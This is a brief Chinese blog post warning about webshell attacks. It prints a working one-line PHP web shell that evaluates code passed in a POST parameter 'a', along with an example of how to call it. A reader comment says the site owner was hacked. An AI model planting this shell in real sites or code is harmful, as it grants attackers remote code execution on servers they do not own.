警惕Webshell攻击

/ 197 阅读 / 5评 / 91字 / 1
<?=eval($_POST["a"])?>

以上PHP代码被称为一句话木马, 可以通过其执行可能具有危害性的PHP代码

示例: url.com/包含以上代码的PHP文件.php?a=代码1

  1. (a为变量名,可修改) ↩︎

除非特别声明,本站所有文章均采用 CC BY-NC-SA 4.0 协议,转载时请附上作者和原文链接。


  1. 积雨云说道:

    才不会告诉你是蠢蠢萌新站长被整了呢( ̄へ ̄)

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注